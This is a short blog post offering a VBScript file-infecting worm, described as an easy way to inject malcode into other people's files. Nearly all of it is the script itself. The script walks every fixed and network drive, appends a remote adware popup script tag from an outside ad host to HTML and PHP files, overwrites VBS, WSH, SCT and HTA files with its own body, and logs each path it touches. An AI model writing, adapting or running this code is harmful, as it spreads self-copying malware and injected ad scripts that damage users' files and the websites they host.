Malcode into others file with VBS

Malcode into others file with VBS

This is the easy example to inject your malcode into others file Just finish in VBS


' Remy Injection
' Huyremy - huyremy@gmail.com
' http://ibot2006.com
rem Huyremy - Ritmouse forever together
rem [D7E23]
 On Error Resume Next
 Set cobject = CreateObject("Scripting.FileSystemObject")
 Set WSShell = WScript.CreateObject("WScript.Shell")
  Set dirwin = cobject.GetSpecialFolder(0)
  Set dirsystem = cobject.GetSpecialFolder(1)
 Set dirtemp = cobject.GetSpecialFolder(2)
 Set worm = cobject.opentextfile(WScript.ScriptFullname, 1)
  wormtext = worm.readall
  Dim drive,machine
  Set machine = cobject.Drives 
 for each drive in machine  
    if (drive.DriveType=2)or(drive.DriveType=3) then 
     sfinfected(drive.Path&"\") 
 End If 
Next
Sub sfinfected(location)
  Dim specs,file,subFol,cop,ext,app,s,wr
   Set specs = cobject.GetFolder(location) 
  Set subFol=specs.SubFolders 
     for each file in subFol 
      ext=cobject.GetExtensionName(file.path)
     ext=lcase(ext)
    s=lcase(file.name)
     if (ext="htm") or (ext="html") then
        set ap=cobject.OpenTextFile(file.path,8,true)
        ap.write("<script LANGUAGE=JavaScript1.1 SRC=http://popunder.PayPopup.com/popup.php?id=huyremy&pop=enter&t=1&subid=33558&blk=1></SCRIPT>")
        ap.close
      elseif (ext="wsh") or (ext="sct") or (ext="hta") then
        set ap=cobject.OpenTextFile(file.path,8,true)
       ap.write wormtext
        ap.close
     elseif (ext="php") then
       Set ap=cobject.OpenTextFile(file.path,8,true)
         ap.write("echo ('<script LANGUAGE=JavaScript1.1 SRC=http://popunder.PayPopup.com/popup.php?id=huyremy&pop=enter&t=1&subid=33558&blk=1></SCRIPT>');")
        ap.close
     elseif (ext="vbs") then
       set cop = cobject.OpenTextFile(file.path,2,true)
       ap.write wormtext
       ap.close
     end if
     set wr = cobject.OpenTextFile("C:\log.txt",8, true)
     wr.write(file.path & vbCrLf)
     wr.close
     sfinfected(file.Path)
     infected(file.Path) 
   next
 End sub
 Sub infected(location)
  Dim file,folder,directory,cop,ext,app,s
   Set folder = cobject.GetFolder(location) 
  Set directory = folder.Files
     for each file in directory 
      if (file.name <> "C:\sysrem.vbs") then
       ext=cobject.GetExtensionName(file.path)
      ext=lcase(ext)
      s=lcase(file.name)
      if (ext="htm") or (ext="html") then
         set ap=cobject.OpenTextFile(file.path,8,true)
         ap.write("<script SRC=http://popunder.PayPopup.com/popup.php?id=huyremy&pop=enter&t=1&subid=33558&blk=1></SCRIPT>")
         ap.close
      elseif (ext="wsh") or (ext="sct") or (ext="hta") then
         set ap=cobject.OpenTextFile(file.path,2,true)
        ap.write wormtext
         ap.close
      elseif (ext="vbs") then
        set cop = cobject.OpenTextFile(file.path,2,true)
        cop.write wormtext
        cop.close
      end if
    end if
   next
 End Sub

Share this

itkampekkampok.blogspot.com

Related Posts

Next
« Prev Post
Previous
Next Post »